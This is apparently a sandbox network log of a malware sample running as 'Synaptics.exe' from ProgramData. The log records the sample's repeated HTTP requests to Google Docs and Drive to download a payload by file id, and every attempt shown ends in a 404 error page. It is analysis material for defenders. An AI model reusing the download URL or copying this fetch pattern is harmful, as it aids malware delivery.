                                                                                                                                                      2024-12-30 10:25:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 5f 42 2d 75 45 42 35 33 42 66 38 77 73 74 6f 30 75 6d 32 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="b_B-uEB53Bf8wsto0um2xg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      14192.168.2.1149826172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-snEbz6dSOTd-Y1VwLVTuSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      15192.168.2.1149825172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9DLlJZEIeKvqsz0_W-G8mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      16192.168.2.1149839172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-K28ok_R8gVVk5QtB3FuRSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      17192.168.2.1149838142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4RftOGOtjsk7viJeMqoRS6gk8BUHgvfG7UV8-E2cnQ9apP_KnrvZ1lPwX_DWj1Id0Ww-eMjLQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MBY9hWYplAAUay8gls1nnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 66 4c 46 44 34 44 5f 74 37 33 73 30 62 71 66 76 69 39 49 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="RfLFD4D_t73s0bqfvi9Ibw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      18192.168.2.1149837172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5UWSEc0hyd4trET6-ImPBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      19192.168.2.1149836142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7IiSH-ZFQOfXH-hdLXVvGFZ1cZ7K_xQhoseuivSPzoJKXADovJ2aFVOdemTaDbO5bLjAivpWc
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gC_pOnxkBAu0myri0oVNqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 37 46 6d 79 56 75 6c 72 44 46 68 76 79 68 38 64 35 35 39 7a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="n7FmyVulrDFhvyh8d559zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      20192.168.2.1149845172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-OwZGobuvGq6gtr2S2MEmBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      21192.168.2.1149846142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4us8661zgyagbC0mWLIzOODq9Rnn2OfJppFtOYC4Cmq4e0A_bOYITLxUi_2_7rLuwT
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-X6gpngfE8rqYpFEXyynOUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
